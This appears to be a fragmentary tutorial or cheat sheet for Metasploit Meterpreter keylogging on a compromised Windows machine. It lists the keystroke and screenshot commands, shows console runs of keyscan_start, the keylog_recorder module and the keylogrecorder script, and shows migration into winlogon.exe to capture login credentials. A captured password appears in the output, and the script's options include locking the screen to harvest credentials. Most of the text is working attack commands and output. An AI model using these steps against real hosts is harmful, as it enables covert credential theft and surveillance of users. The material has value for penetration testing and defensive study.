Stdapi: User interface
Commands =============================== Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components |
meterpreter >
keyscan_start meterpreter > keyscan_dump Dumping captured keystrokes... ipconfig <Return> dir <Return> meterpreter > |
meterpreter > run
post/windows/capture/keylog_recorder [*] Executing module against BOBWRK [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to xxx/.msf4/loot/192.168.0.1_host.windows.key_030845.txt [*] Recording keystrokes... |
[*] Saving last few
keystrokes... [*] Interrupt [*] Stopping keystroke sniffer... meterpreter > |
Keystroke log started at
2012-10-22 14:54:24 -0400 dir <Return> ping bob <Return> <Ctrl> |
meterpreter > bgrun
keylogrecorder -c 1 -t 15 [*] Executed Meterpreter with Job ID 1 meterpreter > [*] winlogon.exe Process found, migrating into 1668 [*] Migration Successful!! [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to xxx/.msf4/logs/scripts/keylogrecorder/192.168.0.1_20121022.9870.txt [*] Recording |
<LWin>
<Ctrl> <LCtrl> <Alt>
<LMenu> <Delete> password01 |
meterpreter > bgrun
keylogrecorder -c 0 -t 15 [*] Executed Meterpreter with Job ID 2 meterpreter > [*] explorer.exe Process found, migrating into 2212 [*] Migration Successful!! [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to xxx/.msf4/logs/scripts/keylogrecorder/192.168.0.1_20121022.1234.txt [*] Recording |
help <Return> dir
<Return> tree <Return> dir <Return> cd <Return>
dir <Return> help <Return> tree <Return> |
meterpreter > bgkill 2 [*] Killing background job 2... |
"-h" => [ false, "Help
menu." ], "-t" => [ true, "Time interval in seconds between recollection of keystrokes, default 30 seconds." ], "-c" => [ true, "Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0." ], "-l" => [ false, "Lock screen when capturing Winlogon credentials."] Address : <https://bitbucket.org/jrossi/metasploit/src/051868ee9a9c/scripts/meterpreter/keylogrecorder.rb> |